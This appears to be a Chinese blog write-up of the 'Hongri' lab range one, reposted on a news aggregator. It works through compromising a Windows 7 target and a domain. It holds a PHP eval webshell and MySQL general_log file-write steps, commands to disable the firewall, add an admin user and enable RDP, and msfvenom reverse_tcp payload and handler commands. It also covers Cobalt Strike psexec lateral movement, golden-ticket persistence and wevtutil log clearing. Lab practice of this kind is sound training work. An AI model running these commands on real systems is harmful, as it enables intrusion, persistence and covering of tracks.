当前位置: 首页 > news >正文

红日靶场一实操笔记

一,网络拓扑图

二,信息搜集

1.kali机地址:192.168.50.129

2.探测靶机

注:需要win7开启c盘里面的phpstudy的服务。

nmap -sV -Pn 192.168.50.128

或者扫 nmap -PO 192.168.50.0/24 

可以看出来win7(ip为192.168.50.128)的靶机开启了80端口和3306端口 

访问一下80端口,可以发现是一个phpstudy探针,即网站是phpstudy搭建的。

同时,这个页面泄露了很多信息:管理员邮箱,服务器版本,php版本,绝对路径等。

在此页面的最下面有mysql的登录接口,可以用弱口令root/root登录。

可以成功登录至mysql数据库

 3,目录扫描

用kali自带的dirb扫描,命令:dirb http://192.168.50.128

使用命令

-a     设置user-agent
-p     <proxy[:port]>设置代理
-c     设置cookie
-z     添加毫秒延迟,避免洪水攻击
-o     输出结果
-X     在每个字典的后面添加一个后缀
-H     添加请求头
-i     不区分大小写搜索

可以扫描得到数据库:http://192.168.50.128/phpMyAdmin 

或者用御剑,不仅有数据库的地址,还有一个备份文件,这个备份文件打开发现是yxcms的网站源码,应该部署着这个CMS 。

三,漏洞利用

1.数据库

(1)访问上面得到的数据库的地址,登录进去

 界面如下

 (2)然后看看数据库的权限,找出所有和安全有关的全局系统变量

SHOW GLOBAL VARIABLES LIKE '%secure%'

结果:

  • secure_auth = OFF:支持旧版密码认证,可能降低安全性,建议开启(ON)。

  • secure_file_priv = NULL:完全禁用了 MySQL 文件读写,防止 SQL 注入和文件操作漏洞,提高安全性。

(3)再看看有没有开启全局日志

SHOW GLOBAL VARIABLES LIKE '%general%'

结果:

general_log = OFF:MySQL 的通用查询日志(General Query Log)功能被禁用

general_log_file = C:\phpStudy\MySQL\data\stul.log:日志文件的储存路径。假如general_log 被开启(ON),那么所有执行的 SQL 语句都会被写入这个文件。

(4) 开启全局日志的功能,并修改日志保存的绝对路径。

修改为:

SET GLOBAL general_log='on'; 

SET GLOBAL general_log_file='C:/phpStudy/WWW/2.php'

绝对路径改为探针这个路径相似的

改状态

改保存日志的路径

(5)写码蚁剑连接,或者直接访问看看是否成功

select '<?php eval ($_POST[s]);?>'

蚁剑连接

访问一下

2.cms

(1)根据上面得到的信息,访问网站,在公告信息里面可以找到后台登录的地址,账号和密码

 登录一下看看,这个是登录界面

后台有如下内容

可以在前台模版里面发现可以编辑的php文件

(2)写个shell

(3)目录扫描找路径

或者可以直接下载备份文件,根目录如下

直接搜索找得到文件位置

(4)蚁剑连接

进去以后看看shell的权限,是管理员权限

 (5)关闭防火墙(这是一个好习惯)

netsh advfirewall set allprofiles state off

(6)尝试添加一个新用户,进行远程登录

net user ctf root@1234 /add # 添加账户密码
net localgroup administrators ctf /add  # 添加为管理员权限
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f     # 开启3389端口

(7)进行远程登录

四.cs上线

(一).cs监听传码

1.启动cs

./teamserver 192.168.50.129 123456  //ip是kali(攻击机)

2.启动客户端

sh cs.sh

注:Cobalt Strike 不支持 OpenJDK 1.8,需要 Oracle Java 8OpenJDK 11 及以上

启动客户端的ip是kali(监听机)的ip,然后端口默认50050,用户名默认neo,密码用之前设置的123456

3.创建监听器

这里的ip是kali(监听机的)

创建监听 ,也是kali(攻击机的ip)

创建windows可执行exe程序。选择如下

配置如下

3.传马

将生成的木马文件放到kali的桌面,再通过蚁剑上传

(二).反弹提权

1.进入交互

进入蚁剑的终端,运行一下后门文件。

上线成功,进入反弹的ip,选择beacon

 执行sleep 0,sleep 0则表示进入交互模式,任何输入的命令都会被立即执行。

2.提权

shell systeminfo 查看系统信息,看到只打了四个补丁。

尝试进行提权,鼠标右键win7ip,里面有提权

配置如下 ,出现图后面的user为system*就是成功了

 五.上线msf(和上面cs是一个作用)

(1).msf生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.129 LPORT=7777 -f exe > shell.exe

 将得到的木马用蚁剑上传

运行木马

 (2).msf监听

msfconsole   //启动msf

use exploit/multi/handler  //配置 Handler,使用 multi/handler 模块接收来自目标机器的连接

set payload windows/meterpreter/reverse_tcp   //设置payload

set lhost 192.168.50.128

set lport 7777                                                                          //设置 LHOST 和 LPORT

run            //运行

 

提权

六,内网信息收集

1.先关闭防火墙

shell netsh advfirewall set allprofiles state off

2.查看网络适配器

shell ipconfig 

3.查看本地用户

shell net user 

4.查看计算机名

shell net view

 5.判断是否存在域

shell net config Workstation

6.看看有几个域

shell net view /domain

7.端口扫描

在system权限下运行

扫win7ip的

结果为

8.抓取明文密码

在system权限下运行

抓明文密码等下内网横向要用

结果为:

 

总结:

七.内网横向

1.创建SMB监听器

端口扫描的时候发现开放了445端口,可以创建SMB监听隧道

通过隧道检查内网(52网段) 得到其他台主机IP,操作如下

结果是

 2.横向移动

切换到目标列表,选择jump的psexec

选择配置如下

然后横向成功,进入了域控

 八.黄金票据(留后门)

黄金票据是指能够绕过认证授权(Authentication and Authorization)机制并获得所需权限的票据。这种票据可以被攻击者收集和利用,从而从系统内部获取高权限,甚至完全控制系统。

1.重新提取一下hash和明文密码

 2.黄金票据配置

执行成功

九.痕迹清除

shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

 


http://www.mrgr.cn/news/96945.html

相关文章:

  • 第一期:Spring Web MVC 入门 [特殊字符](基础概念 + 环境搭建)
  • 【408--考研复习笔记】操作系统----知识点速览
  • <贪心算法>
  • 打包python文件生成exe
  • 电子电气架构 --- 控制器级架构
  • C#实现HiveQL建表语句中特殊数据类型的包裹
  • Spring 核心技术解析【纯干货版】- XVIII:Spring 网络模块 Spring-WebSocket 模块精讲
  • leetcode-热题100(3)
  • 基于 Jackson 的 JSON 工具类实现解析与设计模式应用
  • Android 系统ContentProvider流程
  • Docker in Docker(Dind)
  • 解决Centos7集成IDEA报git版本太低问题
  • [leetcode]回溯法
  • 总结面试中可能会涉及到简历的问题
  • 合并有序链表
  • Windows系统服务器安装Office Online Server
  • leetcode 62. Unique Paths
  • DeepSeek-R1 模型现已在亚马逊云科技上提供
  • 【大模型系列篇】大模型基建工程:基于 FastAPI 自动构建 SSE MCP 服务器
  • 关于依赖注入框架VContainer DIIOC 的学习记录